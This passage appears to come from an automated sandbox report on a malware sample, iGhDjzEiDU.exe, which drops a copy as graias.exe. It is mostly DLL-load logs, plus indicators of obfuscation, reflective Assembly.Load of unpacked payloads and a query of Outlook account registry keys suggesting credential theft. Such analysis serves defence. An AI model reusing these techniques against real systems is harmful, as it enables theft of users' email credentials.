                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: coreuicomponents.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: coremessaging.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: windows.shell.servicehostbuilder.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: windows.staterepositoryps.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: edputil.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: policymanager.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: msvcp110_win.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: onecorecommonproxystub.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: textshaping.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: textinputframework.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: coreuicomponents.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: coremessaging.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: windows.shell.servicehostbuilder.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: windows.staterepositoryps.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: edputil.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: policymanager.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: msvcp110_win.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: onecorecommonproxystub.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: textshaping.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: textinputframework.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: coreuicomponents.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: coremessaging.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: coremessaging.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: windows.shell.servicehostbuilder.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: windows.staterepositoryps.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: edputil.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: policymanager.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: msvcp110_win.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: onecorecommonproxystub.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: textshaping.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: textinputframework.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: coreuicomponents.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: coremessaging.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: coremessaging.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: windows.shell.servicehostbuilder.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: windows.staterepositoryps.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: edputil.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: policymanager.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: msvcp110_win.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: onecorecommonproxystub.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: dxdiagn.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: d3d11.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: d3d12.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: powrprof.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: devobj.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: winmmbase.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: dxgi.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: wmiclnt.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: dxgi.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: umpdc.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: wbemcomn.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: amsi.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: winbrand.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: dsound.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: resourcepolicyclient.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: devrtl.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: spinf.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: drvstore.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: spfileq.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: wifidisplay.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: dnsapi.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: mswsock.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: wlanapi.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: mmdevapi.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: mfplat.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: rtworkq.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: mf.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: mfcore.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: ksuser.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: mfperfhelper.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: mfsensorgroup.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: comppkgsup.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: windows.media.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: windows.applicationmodel.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: twinapi.appcore.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: appxdeploymentclient.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                Source: Window Recorder Window detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                Source: iGhDjzEiDU.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: iGhDjzEiDU.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: BasicDisplay.pdb source: dxdiag.exe, 00000021.00000003.2105510977.0000000005721000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000021.00000003.2048401566.00000000031DF000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: BasicDisplay.pdbUGP source: dxdiag.exe, 00000021.00000003.2105510977.0000000005721000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000021.00000003.2048401566.00000000031DF000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                Source: 0.2.iGhDjzEiDU.exe.7940000.6.raw.unpack, MainForm.cs .Net Code: System.Reflection.Assembly.Load(byte[])
                Source: 0.2.iGhDjzEiDU.exe.9470000.7.raw.unpack, GY0wQ6K1nUpCqMVFnw.cs .Net Code: kkJatZJNv4 System.Reflection.Assembly.Load(byte[])
                Source: 0.2.iGhDjzEiDU.exe.4309f98.5.raw.unpack, GY0wQ6K1nUpCqMVFnw.cs .Net Code: kkJatZJNv4 System.Reflection.Assembly.Load(byte[])
                Source: 0.2.iGhDjzEiDU.exe.33d9654.0.raw.unpack, MainForm.cs .Net Code: System.Reflection.Assembly.Load(byte[])
                Source: 6.2.graias.exe.2e09748.2.raw.unpack, MainForm.cs .Net Code: System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Code function: 5_2_0041BCF3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 5_2_0041BCF3
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Code function: 0_2_0552B200 push eax; retf 0_2_0552B319
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Code function: 0_2_0797E19D push 8B000001h; iretd 0_2_0797E1CC
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Code function: 0_2_0797E1D7 push 8B000001h; iretd 0_2_0797E1DD
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Code function: 5_2_00434006 push ecx; ret 5_2_00434019
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Code function: 5_2_004567F0 push eax; ret 5_2_0045680E
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Code function: 5_2_0045B9DD push esi; ret 5_2_0045B9E6
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Code function: 5_2_00455EBF push ecx; ret 5_2_00455ED2
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Code function: 6_2_0291B200 push eax; retf 6_2_0291B319
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Code function: 6_2_06D0C8B0 push es; ret 6_2_06D0C8C0
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Code function: 6_2_06D0E1D7 push 8B000001h; iretd 6_2_06D0E1DD
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Code function: 6_2_06D0E19D push 8B000001h; iretd 6_2_06D0E1CC
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Code function: 6_2_06E07EE8 push esp; retf 6_2_06E07EF5
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Code function: 6_2_06E003B8 push eax; ret 6_2_06E003B9
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Code function: 6_2_06E07F80 pushfd ; retf 6_2_06E07F8D
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Code function: 6_2_06E069A9 pushad ; retf 6_2_06E069B5
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Code function: 8_2_10002806 push ecx; ret 8_2_10002819
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Code function: 8_2_10009FD8 push esi; ret 8_2_10009FD9
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Code function: 38_2_0044693D push ecx; ret 38_2_0044694D
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Code function: 38_2_0044DB70 push eax; ret 38_2_0044DB84
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Code function: 38_2_0044DB70 push eax; ret 38_2_0044DBAC
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Code function: 38_2_00451D54 push eax; ret 38_2_00451D61
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Code function: 39_2_0044B090 push eax; ret 39_2_0044B0A4
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Code function: 39_2_0044B090 push eax; ret 39_2_0044B0CC
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Code function: 39_2_00444E71 push ecx; ret 39_2_00444E81
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Code function: 41_2_00414060 push eax; ret 41_2_00414074
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Code function: 41_2_00414060 push eax; ret 41_2_0041409C
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Code function: 41_2_00414039 push ecx; ret 41_2_00414049
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Code function: 41_2_004164EB push 0000006Ah; retf 41_2_004165C4
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Code function: 41_2_00416553 push 0000006Ah; retf 41_2_004165C4
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Code function: 41_2_00416555 push 0000006Ah; retf 41_2_004165C4
                Source: iGhDjzEiDU.exe Static PE information: section name: .text entropy: 7.85185407933489
                Source: graias.exe.5.dr Static PE information: section name: .text entropy: 7.85185407933489
                Source: 0.2.iGhDjzEiDU.exe.9470000.7.raw.unpack, KsWaPvY6iMkFaFMqkR.csHigh entropy of concatenated method names: 'Dispose', 'RaE1DET5eZ', 'mFiHVS7Nkf', 'tOv8Sfr0Bu', 'rmX1opAG1K', 'huw1zye41K', 'ProcessDialogKey', 'HHBH0YEfDO', 'HqWH1lx3E1', 'bQ7HHXoIey'
                Source: 0.2.iGhDjzEiDU.exe.9470000.7.raw.unpack, ISax0UGT6r9T28RYAO.csHigh entropy of concatenated method names: 'I3fc2i9nvL', 'OnvcJAeYSL', 'pr1ct6ebDa', 'qL1c7FVf1B', 'qKccE2CF6V', 'amtcS3XqdL', 'RWjcvsXoa4', 'wK0cQna2hg', 'GCYcLCexat', 'Cc0cXwYLbv'
                Source: 0.2.iGhDjzEiDU.exe.9470000.7.raw.unpack, TcFXyGaNoLGVFHtkq0.csHigh entropy of concatenated method names: 'mEI1cirEpT', 'V4A1KEyLHD', 'HXf1xq0PeF', 'qWs163UEQb', 'zSr1IiPy3h', 'YAF1ytn9ui', 'ptWT28AKfgnuTGOjHu', 'BiBBHQ6UxLYlWm4UAX', 'FLv11ZCRg4', 'R4M1fDx9FU'
                Source: 0.2.iGhDjzEiDU.exe.9470000.7.raw.unpack, GY0wQ6K1nUpCqMVFnw.csHigh entropy of concatenated method names: 'AEPfnHer6t', 'MJdfFJEvup', 'ITBfYKTtEy', 'S0Of50C1uj', 'Y0BfPWq66m', 'FNdfCFDKDl', 'iUQfcExu0H', 'rg2fKMehIO', 'LPhfB3Du4t', 'pFrfxTUOys'
                Source: 0.2.iGhDjzEiDU.exe.9470000.7.raw.unpack, oirEpTQk4AEyLHDkvV.csHigh entropy of concatenated method names: 'C6FYh5MNiq', 'IvvYjTrBxL', 'BoMYqYVEHh', 'uq2YwAjpuj', 'yPpYU6Sew4', 'TX4Y9Sy8gm', 'kq2YkOH4Yl', 'fvEYdNOwUg', 'ttOYDkNP0y', 'LcQYotSVrQ'
                Source: 0.2.iGhDjzEiDU.exe.9470000.7.raw.unpack, yUNEYV11fRq26bsPudC.csHigh entropy of concatenated method names: 'JLLioc94EI', 'BJLizcnH2u', 'lEvA0PirD8', 'kuoA1PDOH0', 'omBAHBdKdB', 'LesAfV7dU5', 'GIRAaUBJ1x', 'FTOAnIOJbV', 'kMoAFARjRR', 'v9FAYndEnU'
                Source: 0.2.iGhDjzEiDU.exe.9470000.7.raw.unpack, FoIey2oob8woPkHgxe.csHigh entropy of concatenated method names: 'juYi5KlJ4i', 'o44iPVpbMV', 'DypiChV5u1', 'vwyicqyw8t', 'HZpibCdgkO', 'cwRiK7jLE5', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.iGhDjzEiDU.exe.9470000.7.raw.unpack, CXF3dbOvOPd1Ho0I5P.csHigh entropy of concatenated method names: 'cOTRQv66sl', 'fccRLw4QQn', 'bB6RZfcJDN', 'iTTRV6CaSh', 'FCwRernfdH', 'KuQR3OTIM1', 'nfBRr5vONF', 'TjORmGPuGD', 'KMlRTyU85x', 'XGwRpNyUY5'
                Source: 0.2.iGhDjzEiDU.exe.9470000.7.raw.unpack, TEQbsVXqVBlwj7SriP.csHigh entropy of concatenated method names: 'ornPE5vnCX', 'Qo8Pvcr1au', 'GWL5uYa3Ia', 'l0q5ee8Rc5', 'OkX53gJkgf', 'LP35NU6DtG', 'OHD5r4vvO1', 'UGD5muM35A', 'lqr5Gg37Ig', 'uGf5TxxuY4'
                Source: 0.2.iGhDjzEiDU.exe.9470000.7.raw.unpack, sL6QMr10ElDaIL5m1Yb.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'eRaipbQLj5', 'KWUiWopZwi', 'z8biOwmQ67', 'PU2ih0QFUf', 'qHIijc2vau', 'Bauiqcjc3W', 'EP7iwYeWVW'
                Source: 0.2.iGhDjzEiDU.exe.9470000.7.raw.unpack, CFmuHgz2uGmCodnc7W.csHigh entropy of concatenated method names: 'YAIiS0arfP', 'OC5iQfi9dn', 'WQdiLj9wO0', 'tJZiZveKka', 'VYHiVIm9v9', 'nAnieNam4i', 'JPoi3idXG7', 'KXti4fK9hA', 'xIUi26yaed', 'xhdiJ6vNHR'
                Source: 0.2.iGhDjzEiDU.exe.9470000.7.raw.unpack, p3hoAFZtn9uiwEtfKN.csHigh entropy of concatenated method names: 'RNXCnJGTyk', 'QHECYGqyOs', 'ar6CPcoWNM', 'zHYCc0nWBF', 'LKaCKwrj56', 'oIkPU9ZU0L', 'hESP9O2J0K', 'arbPkqvrC7', 'dg8Pdx294o', 'c9PPDwQO1B'
                Source: 0.2.iGhDjzEiDU.exe.9470000.7.raw.unpack, gyjADuLXfq0PeFsWs3.csHigh entropy of concatenated method names: 'qXa57AUKsP', 'X8b5SX3S8P', 'D4e5Qui8rs', 'qal5LYEuXZ', 'YZS5IM8QUF', 'coY5yLO0Ck', 'Dji5sJRCEC', 'Swn5gU3Y1B', 'mSx5bjF3qG', 'tuT5ioAkbN'
                Source: 0.2.iGhDjzEiDU.exe.9470000.7.raw.unpack, tkV5WJwR3JlKYuw1Ej.csHigh entropy of concatenated method names: 'i13sxxg6ye', 'UAVs6J3jGf', 'ToString', 'dbasFI3BwU', 'rinsYdeWB0', 'Tf5s5mM5S2', 'MjjsPa6l1u', 'zLosCVjQIU', 'pyBscPQmod', 'YMYsKVQPUq'
                Source: 0.2.iGhDjzEiDU.exe.9470000.7.raw.unpack, kwsnHd3D9pAL148Rf1.csHigh entropy of concatenated method names: 'Ww7Cr9HDP4', 'JyXCGflTi1', 'o9bCNt1ek6', 'P6vF0u2qBx4QxnA3ypc', 'sBToKX2sXGUnADsyPYF', 'vn1peu2JbdLT0xPgfWw', 'aBU0bj25uZPwellOY9b'
                Source: 0.2.iGhDjzEiDU.exe.9470000.7.raw.unpack, gytIsVqF8MuD80NBw2.csHigh entropy of concatenated method names: 'ToString', 'B3ZypCGBEI', 'UR8yV8hA2f', 's8dyuu4h7x', 'Y0ZyeegDkT', 'KViy3klWnG', 'qrayNtstaX', 'C78yr3tCcQ', 'N3TymAgHAG', 'lQiyGZ8aVf'
